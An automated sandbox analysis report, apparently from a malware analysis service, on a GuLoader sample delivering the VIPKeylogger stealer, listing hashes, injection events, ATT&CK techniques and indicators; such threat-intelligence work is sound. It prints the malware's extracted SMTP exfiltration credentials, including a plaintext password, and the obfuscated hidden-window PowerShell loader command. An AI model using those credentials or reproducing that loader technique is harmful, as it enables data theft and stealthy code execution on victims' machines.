guloader | eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8

General

Target

eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe
Size

802KB
MD5

14ed33e066dd06f67f6890c5253a6d00
SHA1

b3fe5ea7789b82a37a23237dd323ab5ab724d9fb
SHA256

eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8
SHA512

3a3bd3469985f593881b7846e94a7106135a44595410f9e50af3ee71b1d287b1b11b590f97a720f1c8fdf252ae2b4d5936bba93f12ef34122b9b6ba86a2ff713
SSDEEP

24576:YVTcsrgw7l34QD+rjndm1j1LO191KMiV6X97W2Gnm3Tw29:YVcOgqBK+O19LiV6tS2Gnm3TH9

Score

10^/10

guloader vipkeylogger discovery downloader execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.terrazza.hr
Port:
587
Username:
[email protected]
Password:
Vodenjak123!
Email To:
[email protected]

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2532	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2856	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2532	powershell.exe
2856	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2532 set thread context of 2856	2532	powershell.exe	34

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Brackishness.Ops	eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
2856	wabmig.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2532	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	2856	wabmig.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 2532	2376	eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe	30
PID 2376 wrote to memory of 2532	2376	eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe	30
PID 2376 wrote to memory of 2532	2376	eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe	30
PID 2376 wrote to memory of 2532	2376	eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe	30
PID 2532 wrote to memory of 2856	2532	powershell.exe	34
PID 2532 wrote to memory of 2856	2532	powershell.exe	34
PID 2532 wrote to memory of 2856	2532	powershell.exe	34
PID 2532 wrote to memory of 2856	2532	powershell.exe	34
PID 2532 wrote to memory of 2856	2532	powershell.exe	34
PID 2532 wrote to memory of 2856	2532	powershell.exe	34

C:\Users\Admin\AppData\Local\Temp\eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe
"C:\Users\Admin\AppData\Local\Temp\eb63d3d88459c389d3bbf1e307d8a5e40d8ac30c4e9f8b03150e2d4c250896e8.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Wilsonkamret95=Get-Content 'C:\Users\Admin\AppData\Local\Temp\amtsborgmester\pipette\Menise\Knibningen\Eloxals.Fei';$Frkrigstids=$Wilsonkamret95.SubString(3882,3);.$Frkrigstids($Wilsonkamret95)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Program Files (x86)\windows mail\wabmig.exe
    "C:\Program Files (x86)\windows mail\wabmig.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\amtsborgmester\pipette\Menise\Knibningen\Eloxals.Fei

Filesize
75KB

MD5
58db041d563070f2edb4173bb063620b

SHA1
ad3d9c5c1dccf7f5047f5f955884b0c91c190803

SHA256
448bd98efdf1b974ebceadef36c80d27f684440b86344754616a980ca0e3ebca

SHA512
b94cfe76789de191721f2a966b34b6975a3f276d9b74d410c1424378ca0823d06982a14ef05fed60b701694a15623cfc8ffeb0cb5aa4c68433ba4154df91f21d

Download Submit
C:\Users\Admin\AppData\Local\Temp\amtsborgmester\pipette\Menise\Normeringerne.Ava

Filesize
317KB

MD5
e9686d07eebe8ea1ad485f799cacbecd

SHA1
8adb66f78ff878502fb9b8f1e287e0c06f42ef24

SHA256
2b1502799cf04f7643fd449af29ee76ba8e201098e2980f6fa58e39c5c7a3907

SHA512
0f0a8c3f690d8b43097dab37cb527b4f3f064ce556af01065eacfa158bc4c0dcc3e391a62ac641df34a40097c3121b89e1715dbbc9a1b756df4533f37d176044

Download Submit
memory/2532-18-0x0000000073E40000-0x00000000743EB000-memory.dmp

Filesize
5.7MB

Download
memory/2532-14-0x0000000073E40000-0x00000000743EB000-memory.dmp

Filesize
5.7MB

Download
memory/2532-13-0x0000000073E40000-0x00000000743EB000-memory.dmp

Filesize
5.7MB

Download
memory/2532-15-0x0000000073E40000-0x00000000743EB000-memory.dmp

Filesize
5.7MB

Download
memory/2532-11-0x0000000073E41000-0x0000000073E42000-memory.dmp

Filesize
4KB

Download
memory/2532-12-0x0000000073E40000-0x00000000743EB000-memory.dmp

Filesize
5.7MB

Download
memory/2532-20-0x0000000073E40000-0x00000000743EB000-memory.dmp

Filesize
5.7MB

Download
memory/2532-21-0x0000000006730000-0x000000000A550000-memory.dmp

Filesize
62.1MB

Download
memory/2532-22-0x0000000073E40000-0x00000000743EB000-memory.dmp

Filesize
5.7MB

Download
memory/2856-23-0x0000000001220000-0x0000000005040000-memory.dmp

Filesize
62.1MB

Download
memory/2856-30-0x00000000001B0000-0x0000000001212000-memory.dmp

Filesize
16.4MB

Download
memory/2856-44-0x00000000001B0000-0x0000000001212000-memory.dmp

Filesize
16.4MB

Download
memory/2856-45-0x00000000001B0000-0x00000000001FA000-memory.dmp

Filesize
296KB

Download

Analysis

Sharing